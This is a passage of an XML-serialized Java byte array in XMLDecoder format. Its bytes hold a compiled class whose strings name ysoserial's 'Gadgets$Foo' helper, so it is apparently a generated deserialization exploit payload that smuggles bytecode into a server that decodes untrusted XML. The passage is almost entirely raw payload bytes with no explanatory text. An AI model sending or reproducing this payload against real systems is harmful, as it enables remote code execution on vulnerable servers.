index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void 